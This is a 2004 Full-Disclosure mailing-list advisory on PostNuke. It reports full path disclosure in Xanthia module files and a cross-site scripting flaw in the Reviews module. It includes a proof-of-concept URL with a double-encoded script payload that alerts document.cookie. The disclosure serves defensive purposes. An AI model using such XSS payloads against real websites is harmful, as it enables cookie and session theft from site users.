[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Multiple vulnerabilities PostNuke
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Multiple vulnerabilities PostNuke
- From: "DarkBicho" <darkbicho@xxxxxxxxxxx>
- Date: Sun, 18 Jul 2004 03:08:32 -0700
Original Advisory: http://www.swp-zone.org/archivos/advisory-10.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PostNuke :.:
PROGRAM: PostNuke
HOMEPAGE: http://www.postnuke.com/
VERSION: 0.75-RC3, 0.726-3
BUG: Multiple vulnerabilities
DATE: 14/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Perunderforce <www.perunderforce.tk>
Email: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
Postnuke is a popular content management system, written in php.
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
http://localhost/html/modules/Xanthia/pnadmin.php
Fatal error: Call to undefined function: pnmodgetvar() in
c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53
http://localhost/html/modules/Xanthia/pnuserapi.php
Fatal error: Call to undefined function: pnmodgetvar() in
c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49
B. Cross-Site Scripting aka XSS:
Error: function showcontent()
:.: title :
Line 986
--------------------------------- code
------------------------------------------
echo "<p><span
class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)."
</em></strong></span><br />";
echo "<p align=\"justify\"><span class=\"pn-normal\">";
if ($cover != "")
----------------------------------------------------------------------------------
3.- EXPLOIT:
¨¨¨¨¨¨¨
http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent
&id=1&title=%253cscript>alert%2528document.cookie);%253c/script>
Example:
-------
http://www.swp-zone.org/archivos/post-nuke.gif
4.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PostNuke website for updates and official release details.
5.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@xxxxxxxx
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html